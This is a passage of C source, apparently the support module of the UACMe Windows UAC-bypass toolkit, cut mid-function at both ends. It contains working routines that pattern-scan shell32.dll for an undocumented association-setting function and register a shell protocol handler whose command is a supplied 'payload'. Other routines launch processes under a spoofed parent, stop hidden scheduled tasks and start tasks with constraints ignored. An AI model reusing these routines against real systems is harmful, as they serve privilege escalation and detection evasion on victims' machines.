BOOLEAN bStopEnumeration;
bStopEnumeration = FALSE;
signCount = RTL_NUMBER_OF(g_UserAssocSignatures);
//
// Iterate through signatures table.
//
for (i = 0; i < signCount; i++) {
pSignature = g_UserAssocSignatures[i];
Callback(pSignature, Context, &bStopEnumeration);
if (bStopEnumeration)
break;
}
}
/*
* supFindUserAssocSet
*
* Purpose:
*
* Locate internal shell routine.
*
*/
NTSTATUS supFindUserAssocSet(
_Out_ USER_ASSOC_PTR* Function
)
{
HANDLE hModule;
PBYTE ptrCode;
PVOID sectionBase, patternPtr, funcPtr;
ULONG i, j, signCount;
ULONG sectionSize = 0, patternSize = 0;
LONG rel = 0;
hde64s hs;
WCHAR szBuffer[MAX_PATH * 2];
USER_ASSOC_SIGNATURE* pSignature;
USER_ASSOC_PATTERN* pPattern;
PVOID* pTable;
Function->UserAssocSet = NULL;
Function->Valid = FALSE;
//
// Preload shell32.dll
//
hModule = (HMODULE)GetModuleHandle(SHELL32_DLL);
if (hModule == NULL) {
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, SHELL32_DLL);
hModule = (HANDLE)LoadLibraryEx(szBuffer, NULL, 0);
}
if (hModule == NULL)
return STATUS_DLL_NOT_FOUND;
//
// Find text section and remember it boundaries.
//
sectionBase = supLookupImageSectionByName(TEXT_SECTION,
TEXT_SECTION_LEGNTH,
(PVOID)hModule,
§ionSize);
if (sectionBase == NULL || sectionSize == 0)
return STATUS_INVALID_ADDRESS;
ptrCode = NULL;
signCount = RTL_NUMBER_OF(g_UserAssocSignatures);
//
// Iterate through signatures table and try each one for corresponding nt build.
//
for (i = 0; i < signCount; i++) {
pSignature = g_UserAssocSignatures[i];
//
// If Windows version is match use signatures.
//
if (g_ctx->dwBuildNumber >= pSignature->NtBuildMin &&
g_ctx->dwBuildNumber <= pSignature->NtBuildMax)
{
pTable = pSignature->PatternsTable;
//
// Try all available patterns.
//
for (j = 0; j < pSignature->PatternsCount; j++) {
pPattern = pTable[j];
patternPtr = pPattern->Ptr;
patternSize = pPattern->Size;
//
// Lookup signature.
//
ptrCode = (PBYTE)supFindPattern(sectionBase,
sectionSize,
patternPtr,
patternSize);
if (ptrCode) {
//
// Pointer within section.
//
if (IN_REGION(ptrCode, sectionBase, sectionSize)) {
break;
}
else {
ptrCode = NULL;
}
}
}
if (ptrCode)
break;
}
}
if (ptrCode == NULL || patternSize == 0)
return STATUS_NOT_FOUND;
//
// Skip signature bytes.
//
ptrCode = (PBYTE)RtlOffsetToPointer(ptrCode, patternSize);
//
// Disassemble instruction and check it to be call sus.
//
hde64_disasm(ptrCode, &hs);
if (hs.flags & F_ERROR)
return STATUS_INTERNAL_ERROR;
if ((hs.len != 5) || (ptrCode[0] != 0xE8)) //call sus
return STATUS_BAD_DATA;
rel = *(PLONG)(ptrCode + 1);
funcPtr = ptrCode + hs.len + rel;
if (IN_REGION(funcPtr, sectionBase, sectionSize)) {
Function->UserAssocSet = (pfnUserAssocSet)funcPtr;
Function->Valid = TRUE;
return STATUS_SUCCESS;
}
else {
return STATUS_CONFLICTING_ADDRESSES;
}
}
/*
* supRegisterShellAssoc
*
* Purpose:
*
* Set and register shell protocol.
*
*/
NTSTATUS supRegisterShellAssoc(
_In_ LPCWSTR pszExt,
_In_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc,
_In_ LPCWSTR lpszPayload,
_In_ BOOL fCustomURIScheme,
_In_opt_ LPCWSTR pszDefaultValue
)
{
HANDLE classesKey = NULL, protoKey = NULL, assocKey = NULL;
NTSTATUS ntStatus;
SIZE_T sz;
HRESULT hr = E_FAIL;
WCHAR szBuffer[MAX_PATH];
if (UserAssocFunc == NULL)
return STATUS_INVALID_PARAMETER_3;
if (UserAssocFunc->Valid == FALSE)
return STATUS_INVALID_PARAMETER_3;
if (lpszPayload == NULL)
return STATUS_INVALID_PARAMETER_4;
ntStatus = supOpenClassesKey(NULL, &classesKey);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
//
// Write custom pluggable protocol handler mark.
//
if (fCustomURIScheme) {
if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
pszExt,
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,
NULL,
(HKEY*)&protoKey,
NULL))
{
RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);
if (pszDefaultValue) {
sz = (_strlen(pszDefaultValue) + 1) * sizeof(WCHAR);
RegSetValueEx(protoKey, TEXT(""), 0, REG_SZ, (BYTE*)pszDefaultValue, (DWORD)sz);
}
RegCloseKey(protoKey);
}
}
//
// Create protocol registry entry.
//
_strcpy(szBuffer, pszProgId);
_strcat(szBuffer, T_SHELL_OPEN);
_strcat(szBuffer, TEXT("\\"));
_strcat(szBuffer, T_SHELL_COMMAND);
if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
szBuffer,
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&assocKey,
NULL))
{
sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);
if (ERROR_SUCCESS == RegSetValueEx(assocKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)lpszPayload,
(DWORD)sz))
{
ntStatus = STATUS_SUCCESS;
}
else {
ntStatus = STATUS_REGISTRY_IO_FAILED;
}
RegCloseKey(assocKey);
}
else {
ntStatus = STATUS_REGISTRY_IO_FAILED;
}
NtClose(classesKey);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
ntStatus = STATUS_UNSUCCESSFUL;
//
// Register protocol within the shell.
//
if (g_ctx->dwBuildNumber > NT_WIN10_20H2) {
hr = UserAssocFunc->UserAssocSet2(UASET_PROGID,
pszExt,
pszProgId,
2);
}
else {
switch (g_ctx->dwBuildNumber) {
case NT_WIN10_19H1:
case NT_WIN10_19H2:
case NT_WIN10_REDSTONE5:
hr = UserAssocFunc->UserAssocSet2(UASET_PROGID,
pszExt,
pszProgId,
2);
break;
default:
hr = UserAssocFunc->UserAssocSet(UASET_PROGID,
pszExt,
pszProgId);
break;
}
}
if (SUCCEEDED(hr)) {
ntStatus = STATUS_SUCCESS;
}
else if (hr == E_ACCESSDENIED) {
ntStatus = STATUS_ACCESS_DENIED;
}
return ntStatus;
}
/*
* supUnregisterShellAssocEx
*
* Purpose:
*
* Unregister and optionally remove shell protocol.
*
*/
NTSTATUS supUnregisterShellAssocEx(
_In_ BOOLEAN fResetOnly,
_In_ LPCWSTR pszExt,
_In_opt_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc
)
{
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
HANDLE classesKey = NULL;
HRESULT hr;
if (UserAssocFunc == NULL)
return STATUS_INVALID_PARAMETER_3;
if (UserAssocFunc->Valid == FALSE)
return STATUS_INVALID_PARAMETER_3;
if (fResetOnly == FALSE) {
ntStatus = supOpenClassesKey(NULL, &classesKey);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
switch (g_ctx->dwBuildNumber) {
case NT_WIN10_19H1:
case NT_WIN10_19H2:
hr = UserAssocFunc->UserAssocSet2(UASET_CLEAR,
pszExt,
NULL,
0);
break;
default:
hr = UserAssocFunc->UserAssocSet(UASET_CLEAR,
pszExt,
NULL);
break;
}
if (SUCCEEDED(hr))
ntStatus = STATUS_SUCCESS;
if (fResetOnly == FALSE) {
if (pszProgId)
supRegDeleteKeyRecursive(classesKey, pszProgId);
supRegDeleteKeyRecursive(classesKey, pszExt);
NtClose(classesKey);
}
return ntStatus;
}
/*
* supUnregisterShellAssoc
*
* Purpose:
*
* Unregister and remove shell protocol.
*
*/
NTSTATUS supUnregisterShellAssoc(
_In_ LPCWSTR pszExt,
_In_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc
)
{
return supUnregisterShellAssocEx(FALSE,
pszExt,
pszProgId,
UserAssocFunc);
}
/*
* supResetShellAssoc
*
* Purpose:
*
* Enable/disable explorer policies.
*
*/
NTSTATUS supResetShellAssoc(
_In_ LPCWSTR pszExt,
_In_opt_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc
)
{
return supUnregisterShellAssocEx(TRUE,
pszExt,
pszProgId,
UserAssocFunc);
}
/*
* supStopTaskByName
*
* Purpose:
*
* Stop scheduled task by name.
*
*/
BOOL supStopTaskByName(
_In_ LPCWSTR TaskFolder,
_In_ LPCWSTR TaskName
)
{
BOOL bResult = FALSE;
HRESULT hr;
ITaskService* pService = NULL;
ITaskFolder* pRootFolder = NULL;
IRegisteredTask* pTask = NULL;
TASK_STATE taskState;
BSTR bstrTaskFolder = NULL;
BSTR bstrTask = NULL;
VARIANT varDummy;
do {
bstrTaskFolder = SysAllocString(TaskFolder);
if (bstrTaskFolder == NULL)
break;
bstrTask = SysAllocString(TaskName);
if (bstrTask == NULL)
break;
hr = CoCreateInstance(&CLSID_TaskScheduler,
NULL,
CLSCTX_INPROC_SERVER,
&IID_ITaskService,
(void**)&pService);
if (FAILED(hr))
break;
VariantInit(&varDummy);
hr = pService->lpVtbl->Connect(pService,
varDummy,
varDummy,
varDummy,
varDummy);
if (FAILED(hr))
break;
hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);
if (FAILED(hr))
break;
hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);
if (FAILED(hr))
break;
hr = pTask->lpVtbl->get_State(pTask, &taskState);
if (FAILED(hr))
break;
if (taskState == TASK_STATE_RUNNING) {
hr = pTask->lpVtbl->Stop(pTask, 0);
}
bResult = SUCCEEDED(hr);
} while (FALSE);
if (bstrTaskFolder)
SysFreeString(bstrTaskFolder);
if (bstrTask)
SysFreeString(bstrTask);
if (pTask)
pTask->lpVtbl->Release(pTask);
if (pRootFolder)
pRootFolder->lpVtbl->Release(pRootFolder);
if (pService)
pService->lpVtbl->Release(pService);
return bResult;
}
/*
* supPathAddBackSlash
*
* Purpose:
*
* Add trailing backslash to the path if it doesn't have one.
*
*/
LPWSTR supPathAddBackSlash(
_In_ LPWSTR lpszPath
)
{
SIZE_T nLength;
LPWSTR lpszEnd, lpszPrev, lpszResult = NULL;
nLength = _strlen(lpszPath);
if (nLength) {
lpszEnd = lpszPath + nLength;
if (lpszPath == lpszEnd)
lpszPrev = lpszPath;
else
lpszPrev = (LPWSTR)lpszEnd - 1;
if (*lpszPrev != TEXT('\\')) {
*lpszEnd++ = TEXT('\\');
*lpszEnd = TEXT('\0');
}
lpszResult = lpszEnd;
}
return lpszResult;
}
/*
* supOpenShellProcess
*
* Purpose:
*
* Return handle to shell process.
*
*/
HANDLE supOpenShellProcess(
_In_ ULONG dwDesiredAccess
)
{
HWND hwndShell = GetShellWindow();
ULONG processId = 0, desiredAccess = dwDesiredAccess;
GetWindowThreadProcessId(hwndShell, &processId);
if (processId) {
if (!(desiredAccess & PROCESS_CREATE_PROCESS))
desiredAccess |= PROCESS_CREATE_PROCESS;
return OpenProcess(desiredAccess, FALSE, processId);
}
return NULL;
}
/*
* supRunProcessFromParent
*
* Purpose:
*
* Start new process with given parent.
*
*/
HANDLE supRunProcessFromParent(
_In_ HANDLE hParentProcess,
_Inout_opt_ LPWSTR lpApplicationName,
_In_ LPWSTR lpszParameters,
_In_opt_ LPWSTR lpCurrentDirectory,
_In_ ULONG CreationFlags,
_In_ WORD ShowWindowFlags,
_Out_opt_ HANDLE* PrimaryThread
)
{
BOOL bResult = FALSE;
DWORD dwFlags = CreationFlags | CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS;
HANDLE hNewProcess = NULL;
LPWSTR pszBuffer = NULL;
SIZE_T size;
STARTUPINFOEX si;
PROCESS_INFORMATION pi;
if (PrimaryThread)
*PrimaryThread = NULL;
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&si, sizeof(si));
size = (1 + _strlen(lpszParameters)) * sizeof(WCHAR);
pszBuffer = (LPWSTR)supHeapAlloc(size);
if (pszBuffer) {
_strcpy(pszBuffer, lpszParameters);
si.StartupInfo.cb = sizeof(STARTUPINFOEX);
size = 0x30;
do {
if (size > 1024)
break;
si.lpAttributeList = supHeapAlloc(size);
if (si.lpAttributeList) {
if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {
if (UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(hParentProcess), 0, 0))
{
si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
si.StartupInfo.wShowWindow = ShowWindowFlags;
bResult = CreateProcess(lpApplicationName,
pszBuffer,
NULL,
NULL,
FALSE,
dwFlags | EXTENDED_STARTUPINFO_PRESENT,
NULL,
lpCurrentDirectory,
(LPSTARTUPINFO)&si,
&pi);
if (bResult) {
hNewProcess = pi.hProcess;
if (PrimaryThread) {
*PrimaryThread = pi.hThread;
}
else {
CloseHandle(pi.hThread);
}
}
}
if (si.lpAttributeList)
DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine
}
supHeapFree(si.lpAttributeList);
}
} while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);
supHeapFree(pszBuffer);
}
return hNewProcess;
}
/*
* supCreateBindingHandle
*
* Purpose:
*
* Bind handle to the RPC interface.
*
*/
RPC_STATUS supCreateBindingHandle(
_In_ RPC_WSTR RpcInterfaceUuid,
_Out_ RPC_BINDING_HANDLE* BindingHandle
)
{
RPC_STATUS status = RPC_S_INTERNAL_ERROR;
RPC_SECURITY_QOS_V3 sqos;
RPC_WSTR StringBinding = NULL;
RPC_BINDING_HANDLE Binding = NULL;
PSID LocalSystemSid = NULL;
DWORD cbSid = SECURITY_MAX_SID_SIZE;
if (BindingHandle)
*BindingHandle = NULL;
RtlSecureZeroMemory(&sqos, sizeof(sqos));
status = RpcStringBindingComposeW(RpcInterfaceUuid,
TEXT("ncalrpc"),
NULL,
NULL,
NULL,
&StringBinding);
if (status == RPC_S_OK) {
status = RpcBindingFromStringBindingW(StringBinding, &Binding);
RpcStringFreeW(&StringBinding);
if (status == RPC_S_OK) {
LocalSystemSid = LocalAlloc(LPTR, cbSid);
if (LocalSystemSid) {
if (CreateWellKnownSid(WinLocalSystemSid, NULL, LocalSystemSid, &cbSid)) {
sqos.Version = 3;
sqos.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
sqos.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH;
sqos.IdentityTracking = 0;
sqos.Sid = LocalSystemSid;
status = RpcBindingSetAuthInfoExW(Binding,
NULL,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
RPC_C_AUTHN_WINNT,
0,
0,
(RPC_SECURITY_QOS*)&sqos);
if (status == RPC_S_OK) {
*BindingHandle = Binding;
Binding = NULL;
}
}
else {
status = GetLastError();
}
LocalFree(LocalSystemSid);
}
else {
status = ERROR_NOT_ENOUGH_MEMORY;
}
}
}
if (Binding)
RpcBindingFree(&Binding);
return status;
}
/*
* supConcatenatePaths
*
* Purpose:
*
* Concatenate 2 paths.
*
*/
BOOL supConcatenatePaths(
_Inout_ LPWSTR Target,
_In_ LPCWSTR Path,
_In_ SIZE_T TargetBufferSize
)
{
SIZE_T TargetLength, PathLength;
BOOL NeedSeparator;
SIZE_T EndingLength;
SIZE_T i;
if (Target == NULL || Path == NULL || TargetBufferSize == 0)
return FALSE;
// Find current target length.
TargetLength = 0;
while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)
TargetLength++;
if (TargetLength >= TargetBufferSize)
return FALSE;
// Strip trailing backslash from target, but preserve a lone backslash.
if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\')) {
// Do not strip if the target is exactly a single backslash.
if (!(TargetLength == 1 && Target[0] == TEXT('\\')))
{
TargetLength--;
}
}
// Strip leading backslash from path only if target is non‑empty.
if (TargetLength > 0 && Path[0] == TEXT('\\'))
Path++;
// Find path length (after possible stripping).
PathLength = 0;
while (Path[PathLength] != 0)
PathLength++;
// Determine if a separator is needed based on target's last character.
NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\'));
EndingLength = TargetLength + (NeedSeparator ? 1 : 0) + PathLength + 1;
if (EndingLength > TargetBufferSize)
return FALSE;
// Insert separator if needed.
if (NeedSeparator) {
Target[TargetLength] = TEXT('\\');
TargetLength++;
}
// Copy the path.
for (i = 0; i < PathLength; i++)
Target[TargetLength + i] = Path[i];
Target[TargetLength + PathLength] = 0;
return TRUE;
}
/*
* supRemoveDirectoryRecursive
*
* Purpose:
*
* Recursively deletes the specified directory and all the files in it.
*
*/
BOOL supRemoveDirectoryRecursive(
_In_ LPCWSTR Path
)
{
BOOL bFind = TRUE;
BOOL Ret = TRUE;
DWORD dwAttributes;
HANDLE hFind;
WCHAR szTemp[MAX_PATH + 1];
WCHAR FindPath[MAX_PATH + 1];
WIN32_FIND_DATA FindFileData;
_strncpy(FindPath, MAX_PATH, Path, MAX_PATH);
dwAttributes = GetFileAttributes(Path);
if (dwAttributes & FILE_ATTRIBUTE_DIRECTORY) {
supConcatenatePaths(FindPath, TEXT("*.*"), MAX_PATH);
}
hFind = FindFirstFile(FindPath, &FindFileData);
while (hFind != INVALID_HANDLE_VALUE && bFind != FALSE) {
_strncpy(szTemp, MAX_PATH, Path, MAX_PATH);
supConcatenatePaths(szTemp, FindFileData.cFileName, MAX_PATH);
//
// This is a directory, reenter.
//
if ((FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
(FindFileData.cFileName[0] != TEXT('.'))) {
if (!supRemoveDirectoryRecursive(szTemp)) {
Ret = FALSE;
}
RemoveDirectory(szTemp);
}
//
// Remove file.
//
else if (!(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
DeleteFile(szTemp);
}
bFind = FindNextFile(hFind, &FindFileData);
}
FindClose(hFind);
//
// Remove the root directory.
//
dwAttributes = GetFileAttributes(Path);
if (dwAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if (!RemoveDirectory(Path)) {
Ret = FALSE;
}
}
return Ret;
}
/*
* supEnumProcessesForSession
*
* Purpose:
*
* Enumerate running processes in given session and run callback.
*
*/
BOOL supEnumProcessesForSession(
_In_ ULONG SessionId,
_In_ pfnEnumProcessCallback Callback,
_In_opt_ PVOID UserContext
)
{
BOOL bStopEnumeration = FALSE;
ULONG nextEntryDelta = 0;
PVOID processList;
union {
PSYSTEM_PROCESS_INFORMATION Processes;
PBYTE ListRef;
} List;
processList = supGetSystemInfo(SystemProcessInformation);
if (processList) {
List.ListRef = (PBYTE)processList;
do {
List.ListRef += nextEntryDelta;
if (List.Processes->SessionId == SessionId) {
bStopEnumeration = Callback(List.Processes, UserContext);
if (bStopEnumeration)
break;
}
nextEntryDelta = List.Processes->NextEntryDelta;
} while (nextEntryDelta);
supHeapFree(processList);
}
return bStopEnumeration;
}
/*
* supEnableToastForProtocol
*
* Purpose:
*
* Enumerate registered prog id's for the given interface and enable/disable toast for them.
*
*/
VOID supEnableToastForProtocol(
_In_ LPCWSTR lpProtocol,
_In_ BOOL fEnable
)
{
HRESULT hr;
DWORD celtFetched, dwValue;
SIZE_T cbName;
LPWSTR lpProgId, lpValue;
IAssocHandler* assocHandler;
IEnumAssocHandlers* enumHandlers = NULL;
IObjectWithProgID* progId = NULL;
if (FAILED(SHAssocEnumHandlersForProtocolByApplication(lpProtocol,
&IID_IEnumAssocHandlers, (PVOID*)&enumHandlers)))
{
return;
}
do {
celtFetched = 0;
assocHandler = NULL;
hr = enumHandlers->lpVtbl->Next(enumHandlers, 1, &assocHandler, &celtFetched);
if (SUCCEEDED(hr) && celtFetched) {
hr = assocHandler->lpVtbl->QueryInterface(assocHandler,
&IID_IObjectWithProgID, (PVOID*)&progId);
if (SUCCEEDED(hr)) {
lpProgId = NULL;
hr = progId->lpVtbl->GetProgID(progId, &lpProgId);
if (SUCCEEDED(hr) && lpProgId) {
cbName = (4 + _strlen(lpProtocol) +
_strlen(lpProgId) + 1) * sizeof(WCHAR);
lpValue = (LPWSTR)supHeapAlloc(cbName);
if (lpValue) {
_strcpy(lpValue, lpProgId);
_strcat(lpValue, TEXT("_"));
_strcat(lpValue, lpProtocol);
dwValue = fEnable;
RegSetKeyValue(HKEY_CURRENT_USER,
T_APP_ASSOC_TOASTS,
lpValue,
REG_DWORD,
(LPCVOID)&dwValue,
sizeof(DWORD));
supHeapFree(lpValue);
}
CoTaskMemFree(lpProgId);
}
progId->lpVtbl->Release(progId);
}
assocHandler->lpVtbl->Release(assocHandler);
}
} while (celtFetched);
enumHandlers->lpVtbl->Release(enumHandlers);
}
/*
* supWaitForChildProcesses
*
* Purpose:
*
* Check for child instances of process with given name is running and wait some time.
*
*/
ULONG supWaitForChildProcesses(
_In_ LPCWSTR lpProcessName,
_In_ DWORD dwWaitMiliseconds
)
{
BOOL bRetry;
DWORD dwCreatorPid, dwSessionId, dummy, dwCurrentWait, dwMaxWait = dwWaitMiliseconds;
PROCESS_BASIC_INFORMATION pbi;
ULONG nextEntryDelta;
PVOID processList;
HANDLE hEnumProcess;
OBJECT_ATTRIBUTES obja;
CLIENT_ID cid;
UNICODE_STRING lookupPsName;
union {
PSYSTEM_PROCESS_INFORMATION Processes;
PBYTE ListRef;
} List;
dwCreatorPid = HandleToULong(NtCurrentTeb()->ClientId.UniqueProcess);
dwSessionId = NtCurrentPeb()->SessionId;
dwCurrentWait = 0;
if (dwMaxWait < 1000) dwMaxWait = 1000;
RtlSecureZeroMemory(&pbi, sizeof(pbi));
RtlInitUnicodeString(&lookupPsName, lpProcessName);
InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
do {
bRetry = FALSE;
processList = supGetSystemInfo(SystemProcessInformation);
if (processList) {
List.ListRef = (PBYTE)processList;
nextEntryDelta = 0;
do {
List.ListRef += nextEntryDelta;
if (List.Processes->SessionId == dwSessionId &&
RtlEqualUnicodeString(&lookupPsName,
&List.Processes->ImageName,
TRUE))
{
hEnumProcess = NULL;
cid.UniqueProcess = List.Processes->UniqueProcessId;
cid.UniqueThread = NULL;
if (NT_SUCCESS(NtOpenProcess(
&hEnumProcess,
PROCESS_QUERY_LIMITED_INFORMATION,
&obja,
&cid)))
{
if (NT_SUCCESS(NtQueryInformationProcess(hEnumProcess,
ProcessBasicInformation,
&pbi,
sizeof(pbi),
&dummy)))
{
bRetry = (pbi.InheritedFromUniqueProcessId == dwCreatorPid);
}
NtClose(hEnumProcess);
}
}
if (bRetry)
break;
nextEntryDelta = List.Processes->NextEntryDelta;
} while (nextEntryDelta);
supHeapFree(processList);
}
else
break;
if (bRetry) {
Sleep(1000);
dwCurrentWait += 1000;
}
else
break;
} while (dwCurrentWait <= dwMaxWait);
return dwCurrentWait;
}
/*
* supRaiseHardError
*
* Purpose:
*
* Display UACMe hard error.
*
*/
VOID supRaiseHardError(
_In_ NTSTATUS HardErrorStatus
)
{
ULONG dwFlags;
HMODULE hModule = NULL;
WCHAR errorBuffer[1024];
UNICODE_STRING usText;
ULONG_PTR params[] = { (ULONG_PTR)&usText };
HARDERROR_RESPONSE heResponse;
if (HRESULT_FACILITY(HardErrorStatus) == FACILITY_WIN32) {
dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_SYSTEM;
}
else {
dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_HMODULE;
hModule = GetModuleHandle(RtlNtdllName);
}
errorBuffer[0] = 0;
if (FormatMessage(dwFlags,
hModule,
HardErrorStatus,
0,
errorBuffer,
RTL_NUMBER_OF(errorBuffer),
NULL))
{
RtlInitUnicodeString(&usText, errorBuffer);
NtRaiseHardError(STATUS_FATAL_APP_EXIT | HARDERROR_OVERRIDE_ERRORMODE,
RTL_NUMBER_OF(params),
1,
(PULONG_PTR)params,
OptionOk,
(PULONG)&heResponse);
}
}
/*
* supGetThreadTokenImpersonationLevel
*
* Purpose:
*
* Query thread token impersonation level.
*
*/
BOOL supGetThreadTokenImpersonationLevel(
_In_ HANDLE ThreadHandle,
_Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel)
{
ULONG dummy;
HANDLE hToken = NULL;
SECURITY_IMPERSONATION_LEVEL level = SecurityAnonymous;
NTSTATUS ntStatus;
ntStatus = NtOpenThreadToken(ThreadHandle,
MAXIMUM_ALLOWED,
TRUE,
&hToken);
if (NT_SUCCESS(ntStatus)) {
ntStatus = NtQueryInformationToken(hToken,
TokenImpersonationLevel,
(PVOID)&level,
sizeof(SECURITY_IMPERSONATION_LEVEL),
&dummy);
NtClose(hToken);
}
*ImpersonationLevel = level;
return NT_SUCCESS(ntStatus);
}
/*
* supGetTickCount64
*
* Purpose:
*
* GetTickCount64 eqv.
*
*/
ULONGLONG supGetTickCount64(
VOID
)
{
ULARGE_INTEGER tickCount;
#ifdef _WIN64
tickCount.QuadPart = USER_SHARED_DATA->TickCountQuad;
#else
while (TRUE)
{
tickCount.HighPart = (ULONG)USER_SHARED_DATA->TickCount.High1Time;
tickCount.LowPart = USER_SHARED_DATA->TickCount.LowPart;
if (tickCount.HighPart == (ULONG)USER_SHARED_DATA->TickCount.High2Time)
break;
NtYieldExecution();
}
#endif
return (UInt32x32To64(tickCount.LowPart, USER_SHARED_DATA->TickCountMultiplier) >> 24) +
(UInt32x32To64(tickCount.HighPart, USER_SHARED_DATA->TickCountMultiplier) << 8);
}
/*
* supxExamineTaskhost
*
* Purpose:
*
* Find all tasks registered with the host process and stop them.
*
*/
BOOL supxExamineTaskhost(
_In_ HANDLE UniqueProcessId
)
{
HRESULT hr = E_FAIL;
ULONG processId;
LONG i, cTasks = 0;
VARIANT varDummy, varIndex;
ITaskService* pService = NULL;
IRunningTaskCollection* pTasks = NULL;
IRunningTask* pTask;
TASK_STATE taskState = TASK_STATE_UNKNOWN;
do {
hr = CoCreateInstance(&CLSID_TaskScheduler,
NULL,
CLSCTX_INPROC_SERVER,
&IID_ITaskService,
(void**)&pService);
HRESULT_BREAK_ON_FAILED(hr);
VariantInit(&varDummy);
hr = pService->lpVtbl->Connect(pService,
varDummy,
varDummy,
varDummy,
varDummy);
HRESULT_BREAK_ON_FAILED(hr);
hr = pService->lpVtbl->GetRunningTasks(pService,
TASK_ENUM_HIDDEN,
&pTasks);
HRESULT_BREAK_ON_FAILED(hr);
hr = pTasks->lpVtbl->get_Count(pTasks, &cTasks);
HRESULT_BREAK_ON_FAILED(hr);
varIndex.vt = VT_INT;
for (i = 1; i <= cTasks; i++) {
varIndex.lVal = i;
hr = pTasks->lpVtbl->get_Item(pTasks, varIndex, &pTask);
if (SUCCEEDED(hr)) {
processId = 0;
hr = pTask->lpVtbl->get_EnginePID(pTask, &processId);
if (SUCCEEDED(hr) && processId == HandleToUlong(UniqueProcessId)) {
hr = pTask->lpVtbl->get_State(pTask, &taskState);
if (taskState == TASK_STATE_RUNNING) {
hr = pTask->lpVtbl->Stop(pTask);
}
}
pTask->lpVtbl->Release(pTask);
}
}
} while (FALSE);
if (pTasks)
pTasks->lpVtbl->Release(pTasks);
if (pService)
pService->lpVtbl->Release(pService);
return SUCCEEDED(hr);
}
/*
* supEnumTaskhostTasksCallback
*
* Purpose:
*
* Callback for taskhost task enumeration.
*
*/
BOOL CALLBACK supEnumTaskhostTasksCallback(
_In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,
_In_ PVOID UserContext
)
{
PUNICODE_STRING targetProcess = (PUNICODE_STRING)UserContext;
if (!RtlEqualUnicodeString(&ProcessEntry->ImageName, targetProcess, TRUE))
return FALSE;
supxExamineTaskhost(ProcessEntry->UniqueProcessId);
return FALSE;
}
/*
* supStartScheduledTask
*
* Purpose:
*
* Run target task as schtasks does.
*
*/
BOOLEAN supStartScheduledTask(
_In_ LPCWSTR lpTaskFolder,
_In_ LPCWSTR lpTaskName
)
{
HRESULT hr_init, hr = E_FAIL;
ITaskService* pService = NULL;
ITaskFolder* pRootFolder = NULL;
IRegisteredTask* pTask = NULL;
IRunningTask* pRunningTask = NULL;
VARIANT var;
BSTR bstrTaskFolder = NULL;
BSTR bstrTask = NULL;
hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);
do {
bstrTaskFolder = SysAllocString(lpTaskFolder);
if (bstrTaskFolder == NULL) {
break;
}
bstrTask = SysAllocString(lpTaskName);
if (bstrTask == NULL) {
break;
}
hr = CoCreateInstance(&CLSID_TaskScheduler,
NULL,
CLSCTX_INPROC_SERVER,
&IID_ITaskService,
(void**)&pService);
if (FAILED(hr)) {
break;
}
var.vt = VT_NULL;
hr = pService->lpVtbl->Connect(pService, var, var, var, var);
if (FAILED(hr)) {
break;
}
hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);
if (FAILED(hr)) {
break;
}
hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);
if (FAILED(hr)) {
break;
}
hr = pTask->lpVtbl->RunEx(pTask, var, TASK_RUN_IGNORE_CONSTRAINTS, 0, NULL, &pRunningTask);
if (FAILED(hr)) {
break;
}
} while (FALSE);
if (bstrTaskFolder)
SysFreeString(bstrTaskFolder);
if (bstrTask)
SysFreeString(bstrTask);
if (pRunningTask) {
pRunningTask->lpVtbl->Stop(pRunningTask);
pRunningTask->lpVtbl->Release(pRunningTask);
}
if (pTask)
pTask->lpVtbl->Release(pTask);
if (pRootFolder)
pRootFolder->lpVtbl->Release(pRootFolder);
if (pService)
pService->lpVtbl->Release(pService);
if (SUCCEEDED(hr_init))
CoUninitialize();
return SUCCEEDED(hr);
}
/*
* supReplaceVersionInfo
*
* Purpose:
*
* Add a new VERSION_INFO block to the file.
